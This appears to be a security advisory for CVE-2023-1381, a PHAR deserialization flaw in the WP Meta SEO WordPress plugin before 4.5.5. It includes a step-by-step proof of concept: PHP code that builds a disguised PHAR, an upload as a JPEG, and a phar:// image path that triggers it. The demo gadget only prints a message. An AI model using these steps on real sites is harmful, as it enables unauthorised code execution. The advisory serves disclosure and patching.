WP Meta SEO < 4.5.5 – Author+ PHAR Deserialization | CVE 2023-1381

Description

The plugin does not validate image file paths before attempting to manipulate the image files, leading to a PHAR deserialization vulnerability. Furthermore, the plugin contains a gadget chain which may be used in certain configurations to achieve remote code execution.

Proof of Concept

1. Use a WordPress instance on PHP 7.x.
2. Create a PHP file `create_phar.php` with the following code:
    
    <?php

    class Evil {}

    // create new Phar
    $phar = new Phar('poc.phar');
    $phar->startBuffering();
    $phar->addFromString('test.png', 'text');
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();
    
3. Create the PHAR file `poc.phar` by running `php --define phar.readonly=0 create_phar.php`
4. Rename `poc.phar` to `poc.jpg`
5. Upload `poc.jpg` using the Media Editor. Take note of its path within `wp-content/uploads`
6. Add the following code to the site in order to simulate a gadget:
    
    class Evil {
      public function __wakeup() : void {
        die("Arbitrary deserialization");
      }
    }

    
7. Create or edit a post or page in the block editor. Add an `HTML` block with the following contents (but replace any parts of the path to `poc.jpg` as needed for your test server).
    
    <img src="phar://../wp-content/uploads/2023/03/poc.jpg/test.txt">
    
8. Without saving the post or page, open the browser console to view network traffic, then click on “Reload Analysis” in the “SEO Page Optimization” section. Notice the `admin-ajax` request with `action=wpms` and `task=reload_analysis` returns with the text “Arbitrary deserialization”, demonstrating the vulnerability.